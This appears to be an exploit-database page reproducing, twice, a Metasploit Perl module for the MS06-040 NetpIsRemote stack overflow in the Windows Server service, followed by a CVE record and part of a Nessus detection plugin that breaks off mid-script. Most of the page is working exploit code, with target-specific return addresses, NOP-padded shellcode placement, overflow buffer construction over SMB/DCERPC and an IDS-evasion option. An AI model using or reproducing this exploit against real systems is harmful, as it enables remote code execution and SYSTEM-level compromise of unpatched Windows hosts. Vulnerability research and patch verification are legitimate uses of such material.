Search...

Microsoft Windows - NetpIsRemote Remote Overflow Exploit MS06-040

2006-08-10T00:00:00

ID EDB-ID:2162
Type exploitdb
Reporter H D Moore
Modified 2006-08-10T00:00:00

Description

MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040). CVE-2006-3439. Remote exploit for windows platform

                                        
                                            ##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::netapi_ms06_040;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
	'FragSize'    =&gt; [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' =&gt; [ 0,   'IDS Evasion of the bind request' ],
	'DirectSMB'   =&gt; [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
	'Name'    =&gt; 'Microsoft NetpIsRemote() MSO6-040 Overflow',
	'Version' =&gt; '$Revision: 3715 $',
	'Authors' =&gt;
	  [
		'H D Moore &lt;hdm [at] metasploit.com&gt;',
	  ],

	'Arch' =&gt; ['x86'],
	'OS'   =&gt; [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv' =&gt; 1,

	'AutoOpts' =&gt; { 'EXITFUNC' =&gt; 'thread' },
	
	'UserOpts' =&gt;
	  {
		'RHOST' =&gt; [ 1, 'ADDR', 'The target address' ],

		# SMB connection options
		'SMBUSER' =&gt; [ 0, 'DATA', 'The SMB username to connect with', '' ],
		'SMBPASS' =&gt; [ 0, 'DATA', 'The password for specified SMB username', '' ],
		'SMBDOM'  =&gt; [ 0, 'DATA', 'The domain for specified SMB username', '' ],
	  },

	'Payload' =&gt;
	  {
	  	# Technically we can use more space than this, but by limiting it
		# to 370 bytes we can use the same request for all Windows SPs.
		'Space'    =&gt; 370,
		
		'BadChars' =&gt; "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
		'Keys'     =&gt; ['+ws2ord'],

		# sub esp, 4097 + inc esp makes stack happy
		'Prepend' =&gt; "\x81\xc4\xff\xef\xff\xff\x44",
	  },

	'Description' =&gt; Pex::Text::Freeform(
		qq{
        This module exploits a stack overflow in the NetApi32 NetpIsRemote() function
		using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
		other RPC calls could be used to exploit this service. This exploit will result in
		a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
		will likely result in a complete reboot on Windows 2000 and the termination of all 
		SMB-related services on Windows XP. The default target for this exploit should succeed
		on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.
	  }
	  ),

	'Refs' =&gt;
	  [
		[ 'BID', '19409' ],
		[ 'CVE', '2006-3439' ],
		[ 'MSB', 'MS06-040' ],
	  ],

	'DefaultTarget' =&gt; 0,
	'Targets'       =&gt;
	  [
	  	[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ],
		[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ],
		[ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ],
		[ '(stack)  Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll
	  ],

	'Keys' =&gt; ['srvsvc'],

	'DisclosureDate' =&gt; 'Aug 08 2006',
  };

sub new {
	my ($class) = @_;
	my $self =
	  $class-&gt;SUPER::new( { 'Info' =&gt; $info, 'Advanced' =&gt; $advanced }, @_ );
	return ($self);
}

sub Exploit {
	my ($self)      = @_;
	my $target_host = $self-&gt;GetVar('RHOST');
	my $target_port = $self-&gt;GetVar('RPORT');
	my $target_idx  = $self-&gt;GetVar('TARGET');
	my $shellcode   = $self-&gt;GetVar('EncodedPayload')-&gt;Payload;
	my $target_name = '*SMBSERVER';

	my $FragSize = $self-&gt;GetVar('FragSize') || 256;
	my $target   = $self-&gt;Targets-&gt;[$target_idx];

	if (!$self-&gt;InitNops(128)) {
		$self-&gt;PrintLine("Could not initialize the nop module");
		return;
	}

	my ( $res, $rpc );

	my $pipe    = '\BROWSER';
	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
	my $version = '3.0';

	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

	my $dce = Pex::DCERPC-&gt;new(
		'handle'      =&gt; $handle,
		'username'    =&gt; $self-&gt;GetVar('SMBUSER'),
		'password'    =&gt; $self-&gt;GetVar('SMBPASS'),
		'domain'      =&gt; $self-&gt;GetVar('SMBDOM'),
		'fragsize'    =&gt; $self-&gt;GetVar('FragSize'),
		'bindevasion' =&gt; $self-&gt;GetVar('BindEvasion'),
		'directsmb'   =&gt; $self-&gt;GetVar('DirectSMB'),
	  );

	if ( !$dce ) {
		$self-&gt;PrintLine("[*] Could not bind to $handle");
		return;
	}

	my $smb = $dce-&gt;{'_handles'}{$handle}{'connection'};
	
	if (! $smb) {
		$self-&gt;PrintLine("[*] Could not establish SMB session");
		return;
	}

    if ( $target-&gt;[0] =~ /Automatic/ ) {
        if ( $smb-&gt;PeerNativeOS eq 'Windows 5.0' ) {
            $target = $self-&gt;Targets-&gt;[1];
            $self-&gt;PrintLine('[*] Detected a Windows 2000 target');
        }
        elsif ( $smb-&gt;PeerNativeOS eq 'Windows 5.1' ) {
            $target = $self-&gt;Targets-&gt;[2];
            $self-&gt;PrintLine('[*] Detected a Windows XP target');
			$self-&gt;PrintLine('[*] This will not work on SP2!');
        }
        elsif ( $smb-&gt;PeerNativeOS eq 'Windows 4.0' ) {
            $target = $self-&gt;Targets-&gt;[1];
            $self-&gt;PrintLine('[*] Detected a Windows NT 4.0 target');
			$self-&gt;PrintLine('[*] Please email us with the results!');
        }		
        else {
            $self-&gt;PrintLine('[*] No target available for ' . $smb-&gt;PeerNativeOS() );
            return;
        }
    }
		
	#
	#  /* Function 0x1f at 0x767e912c */
	#  long function_1f (
	#    [in] [unique] [string] wchar_t * arg_00,
	#    [in] [string] wchar_t * arg_01,
	#    [out] [size_is(arg_03)] char * arg_02,
	#    [in] [range(0, 64000)] long arg_03,
	#    [in] [string] wchar_t * arg_04,
	#    [in,out] long * arg_05,
	#    [in] long arg_06
	#  );
	#
	
	my $stub;

	#
	# Use the wcscpy() method on NT 4.0 / 2000
	#	
	if ($target-&gt;[0] =~ /2000/ && ! $target-&gt;[3]) {
	
		# Pad our shellcode out with nops
		$shellcode = $self-&gt;MakeNops($target-&gt;[1] - length($shellcode)) . $shellcode;
	
		# Stick it into a path
		my $path = 	$shellcode . (pack('V', $target-&gt;[2]) x 16) . "\x00\x00";

		# Package that into a stub
		$stub =
			Pex::NDR::Long(int(rand(0xffffffff))).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::UnicodeConformantVaryingStringPreBuilt( "\xeb\x02" . "\x00\x00").
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::Long(0);	
	#
	# Use the wcscpy() method on XP SP0/SP1
	#	
	} elsif ($target-&gt;[0] =~ /XP/ && ! $target-&gt;[3]) {

		# XP SP0/SP1
		my $path = 	
			# Shellcode (corrupted ~420 bytes in)
			$shellcode.
			# Padding
			Pex::Text::AlphaNumText($target-&gt;[1] - length($shellcode)).
			# Land 6 bytes in to bypass garbage (XP SP0)
			pack('V', $target-&gt;[2] + 6).
			# Padding
			Pex::Text::AlphaNumText(8).
			# Address to write our shellcode (XP SP0)
			pack('V', $target-&gt;[2]).
			# Padding (required)
			Pex::Text::AlphaNumText(32).
			# Jump straight to shellcode (XP SP1)
			pack('V', $target-&gt;[2]).
			# Padding
			Pex::Text::AlphaNumText(8).						
			# Address to write our shellcode (XP SP1)
			pack('V', $target-&gt;[2]).
			# Padding (required)
			Pex::Text::AlphaNumText(32).			
			# Terminate
			"\x00\x00";

		# Package that into a stub
		$stub =
			Pex::NDR::Long(int(rand(0xffffffff))).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::Long(0);

	#
	# Use the stack overflow method if a return address is set
	#
	} elsif( $target-&gt;[3]) {

		my $buff = Pex::Text::AlphaNumText(800);
		substr($buff, 0, length($shellcode), $shellcode);
		substr($buff, $target-&gt;[1], 4, pack('V', $target-&gt;[3]));
		substr($buff, $target-&gt;[2], 5, "\xe9" . pack('V', ($target-&gt;[1] + 5) * -1 ));
		
		my $path = "\\\x00\\\x00". $buff. "\x00\x00";

		# Package that into a stub
		$stub =
			Pex::NDR::Long(int(rand(0xffffffff))).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::UnicodeConformantVaryingString('').
			Pex::NDR::Long(int(rand(250)+1)).
			Pex::NDR::Long(0);
	} else {
		$self-&gt;PrintLine("This target is not currently supported");
		return;
	}


	$self-&gt;PrintLine("[*] Sending request...");
	
	# Function 0x1f is not the only way to exploit this :-)
	my @response = $dce-&gt;request( $handle, 0x1f, $stub );
	
	if ( length($dce-&gt;{'response'}-&gt;{'StubData'}) &gt; 0) {
		$self-&gt;PrintLine("[*] The server rejected it, trying again...");
		@response = $dce-&gt;request( $handle, 0x1f, $stub );
	}
	
	if ( length($dce-&gt;{'response'}-&gt;{'StubData'}) &gt; 0) {
		$self-&gt;PrintLine("[*] This system may be patched or running Windows XP SP1 or SP2");
	}
	
	if (@response) {
		$self-&gt;PrintLine('[*] RPC server responded with:');
		foreach my $line (@response) {
			$self-&gt;PrintLine( '[*] ' . $line );
		}
	}

	return;
}

1;

# milw0rm.com [2006-08-10]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:2162", "hash": "b85faea797adafde9696455d8ade6e9f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows - NetpIsRemote Remote Overflow Exploit MS06-040", "description": "MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040). CVE-2006-3439. Remote exploit for windows platform", "published": "2006-08-10T00:00:00", "modified": "2006-08-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/2162/", "reporter": "H D Moore", "references": [], "cvelist": ["CVE-2006-3439"], "lastseen": "2016-01-31T15:39:27", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 9.4, "vector": "NONE", "modified": "2016-01-31T15:39:27"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3439"]}, {"type": "saint", "idList": ["SAINT:196A97F73EEF3B5D1EFCFB0026B813A8", "SAINT:FAA2D7963586117985DEDCB8ABB67809", "SAINT:CF84C615CA476A001FFE4FD66C27D477"]}, {"type": "osvdb", "idList": ["OSVDB:27845"]}, {"type": "exploitdb", "idList": ["EDB-ID:16367", "EDB-ID:2265", "EDB-ID:2355", "EDB-ID:2223"]}, {"type": "cert", "idList": ["VU:650769"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13789"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82940"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902782"]}, {"type": "nessus", "idList": ["SMB_KB921883.NASL", "SMB_NT_MS06-040.NASL"]}, {"type": "canvas", "idList": ["MS06_040"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS06_040_NETAPI"]}, {"type": "mskb", "idList": ["KB921883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}], "modified": "2016-01-31T15:39:27"}, "vulnersScore": 9.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2162/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::netapi_ms06_040;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\n\r\nuse Pex::DCERPC;\r\nuse Pex::NDR;\r\n\r\nmy $advanced = {\r\n\t'FragSize' => [ 256, 'The DCERPC fragment size' ],\r\n\t'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],\r\n\t'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],\r\n };\r\n\r\nmy $info = {\r\n\t'Name' => 'Microsoft NetpIsRemote() MSO6-040 Overflow',\r\n\t'Version' => '$Revision: 3715 $',\r\n\t'Authors' =>\r\n\t [\r\n\t\t'H D Moore <hdm [at] metasploit.com>',\r\n\t ],\r\n\r\n\t'Arch' => ['x86'],\r\n\t'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],\r\n\t'Priv' => 1,\r\n\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [ 1, 'ADDR', 'The target address' ],\r\n\r\n\t\t# SMB connection options\r\n\t\t'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],\r\n\t\t'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],\r\n\t\t'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t \t# Technically we can use more space than this, but by limiting it\r\n\t\t# to 370 bytes we can use the same request for all Windows SPs.\r\n\t\t'Space' => 370,\r\n\t\t\r\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\r\n\t\t# sub esp, 4097 + inc esp makes stack happy\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(\r\n\t\tqq{\r\n This module exploits a stack overflow in the NetApi32 NetpIsRemote() function\r\n\t\tusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\r\n\t\tother RPC calls could be used to exploit this service. This exploit will result in\r\n\t\ta denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\r\n\t\twill likely result in a complete reboot on Windows 2000 and the termination of all \r\n\t\tSMB-related services on Windows XP. The default target for this exploit should succeed\r\n\t\ton Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.\r\n\t }\r\n\t ),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t[ 'BID', '19409' ],\r\n\t\t[ 'CVE', '2006-3439' ],\r\n\t\t[ 'MSB', 'MS06-040' ],\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t \t[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ],\r\n\t\t[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ],\r\n\t\t[ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ],\r\n\t\t[ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll\r\n\t ],\r\n\r\n\t'Keys' => ['srvsvc'],\r\n\r\n\t'DisclosureDate' => 'Aug 08 2006',\r\n };\r\n\r\nsub new {\r\n\tmy ($class) = @_;\r\n\tmy $self =\r\n\t $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );\r\n\treturn ($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy ($self) = @_;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target_name = '*SMBSERVER';\r\n\r\n\tmy $FragSize = $self->GetVar('FragSize') || 256;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (!$self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"Could not initialize the nop module\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy ( $res, $rpc );\r\n\r\n\tmy $pipe = '\\BROWSER';\r\n\tmy $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';\r\n\tmy $version = '3.0';\r\n\r\n\tmy $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );\r\n\r\n\tmy $dce = Pex::DCERPC->new(\r\n\t\t'handle' => $handle,\r\n\t\t'username' => $self->GetVar('SMBUSER'),\r\n\t\t'password' => $self->GetVar('SMBPASS'),\r\n\t\t'domain' => $self->GetVar('SMBDOM'),\r\n\t\t'fragsize' => $self->GetVar('FragSize'),\r\n\t\t'bindevasion' => $self->GetVar('BindEvasion'),\r\n\t\t'directsmb' => $self->GetVar('DirectSMB'),\r\n\t );\r\n\r\n\tif ( !$dce ) {\r\n\t\t$self->PrintLine(\"[*] Could not bind to $handle\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $smb = $dce->{'_handles'}{$handle}{'connection'};\r\n\t\r\n\tif (! $smb) {\r\n\t\t$self->PrintLine(\"[*] Could not establish SMB session\");\r\n\t\treturn;\r\n\t}\r\n\r\n if ( $target->[0] =~ /Automatic/ ) {\r\n if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {\r\n $target = $self->Targets->[1];\r\n $self->PrintLine('[*] Detected a Windows 2000 target');\r\n }\r\n elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {\r\n $target = $self->Targets->[2];\r\n $self->PrintLine('[*] Detected a Windows XP target');\r\n\t\t\t$self->PrintLine('[*] This will not work on SP2!');\r\n }\r\n elsif ( $smb->PeerNativeOS eq 'Windows 4.0' ) {\r\n $target = $self->Targets->[1];\r\n $self->PrintLine('[*] Detected a Windows NT 4.0 target');\r\n\t\t\t$self->PrintLine('[*] Please email us with the results!');\r\n }\t\t\r\n else {\r\n $self->PrintLine('[*] No target available for ' . $smb->PeerNativeOS() );\r\n return;\r\n }\r\n }\r\n\t\t\r\n\t#\r\n\t# /* Function 0x1f at 0x767e912c */\r\n\t# long function_1f (\r\n\t# [in] [unique] [string] wchar_t * arg_00,\r\n\t# [in] [string] wchar_t * arg_01,\r\n\t# [out] [size_is(arg_03)] char * arg_02,\r\n\t# [in] [range(0, 64000)] long arg_03,\r\n\t# [in] [string] wchar_t * arg_04,\r\n\t# [in,out] long * arg_05,\r\n\t# [in] long arg_06\r\n\t# );\r\n\t#\r\n\t\r\n\tmy $stub;\r\n\r\n\t#\r\n\t# Use the wcscpy() method on NT 4.0 / 2000\r\n\t#\t\r\n\tif ($target->[0] =~ /2000/ && ! $target->[3]) {\r\n\t\r\n\t\t# Pad our shellcode out with nops\r\n\t\t$shellcode = $self->MakeNops($target->[1] - length($shellcode)) . $shellcode;\r\n\t\r\n\t\t# Stick it into a path\r\n\t\tmy $path = \t$shellcode . (pack('V', $target->[2]) x 16) . \"\\x00\\x00\";\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub =\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt( \"\\xeb\\x02\" . \"\\x00\\x00\").\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\t\r\n\t#\r\n\t# Use the wcscpy() method on XP SP0/SP1\r\n\t#\t\r\n\t} elsif ($target->[0] =~ /XP/ && ! $target->[3]) {\r\n\r\n\t\t# XP SP0/SP1\r\n\t\tmy $path = \t\r\n\t\t\t# Shellcode (corrupted ~420 bytes in)\r\n\t\t\t$shellcode.\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText($target->[1] - length($shellcode)).\r\n\t\t\t# Land 6 bytes in to bypass garbage (XP SP0)\r\n\t\t\tpack('V', $target->[2] + 6).\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText(8).\r\n\t\t\t# Address to write our shellcode (XP SP0)\r\n\t\t\tpack('V', $target->[2]).\r\n\t\t\t# Padding (required)\r\n\t\t\tPex::Text::AlphaNumText(32).\r\n\t\t\t# Jump straight to shellcode (XP SP1)\r\n\t\t\tpack('V', $target->[2]).\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText(8).\t\t\t\t\t\t\r\n\t\t\t# Address to write our shellcode (XP SP1)\r\n\t\t\tpack('V', $target->[2]).\r\n\t\t\t# Padding (required)\r\n\t\t\tPex::Text::AlphaNumText(32).\t\t\t\r\n\t\t\t# Terminate\r\n\t\t\t\"\\x00\\x00\";\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub =\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\r\n\r\n\t#\r\n\t# Use the stack overflow method if a return address is set\r\n\t#\r\n\t} elsif( $target->[3]) {\r\n\r\n\t\tmy $buff = Pex::Text::AlphaNumText(800);\r\n\t\tsubstr($buff, 0, length($shellcode), $shellcode);\r\n\t\tsubstr($buff, $target->[1], 4, pack('V', $target->[3]));\r\n\t\tsubstr($buff, $target->[2], 5, \"\\xe9\" . pack('V', ($target->[1] + 5) * -1 ));\r\n\t\t\r\n\t\tmy $path = \"\\\\\\x00\\\\\\x00\". $buff. \"\\x00\\x00\";\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub =\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\r\n\t} else {\r\n\t\t$self->PrintLine(\"This target is not currently supported\");\r\n\t\treturn;\r\n\t}\r\n\r\n\r\n\t$self->PrintLine(\"[*] Sending request...\");\r\n\t\r\n\t# Function 0x1f is not the only way to exploit this :-)\r\n\tmy @response = $dce->request( $handle, 0x1f, $stub );\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] The server rejected it, trying again...\");\r\n\t\t@response = $dce->request( $handle, 0x1f, $stub );\r\n\t}\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] This system may be patched or running Windows XP SP1 or SP2\");\r\n\t}\r\n\t\r\n\tif (@response) {\r\n\t\t$self->PrintLine('[*] RPC server responded with:');\r\n\t\tforeach my $line (@response) {\r\n\t\t\t$self->PrintLine( '[*] ' . $line );\r\n\t\t}\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-08-10]\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.", "modified": "2018-10-12T21:40:00", "id": "CVE-2006-3439", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3439", "published": "2006-08-09T01:04:00", "title": "CVE-2006-3439", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-02-21T01:09:21", "bulletinFamily": "scanner", "description": "The remote host is vulnerable to a buffer overrun in the 'Server' service that could allow an attacker to execute arbitrary code on the remote host with 'SYSTEM' privileges.", "modified": "2018-11-15T00:00:00", "id": "SMB_NT_MS06-040.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22182", "published": "2006-08-08T00:00:00", "title": "MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22182);\n script_version(\"1.32\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2006-3439\");\n script_bugtraq_id(19409);\n script_xref(name:\"CERT\", value:\"650769\");\n script_xref(name:\"MSFT\", value:\"MS06-040\");\n script_xref(name:\"MSKB\", value:\"921883\");\n\n script_name(english:\"MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883)\");\n script_summary(english:\"Determines the presence of update 921883\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\n'server' service.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is vulnerable to a buffer overrun in the 'Server'\nservice that could allow an attacker to execute arbitrary code on the\nremote host with 'SYSTEM' privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-040\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-040';\nkb = '921883';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Netapi32.dll\", version:\"5.2.3790.559\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Netapi32.dll\", version:\"5.2.3790.2769\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Netapi32.dll\", version:\"5.1.2600.1874\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Netapi32.dll\", version:\"5.1.2600.2952\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Netapi32.dll\", version:\"5.0.2195.7105\", dir:\"\\system32\", bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n 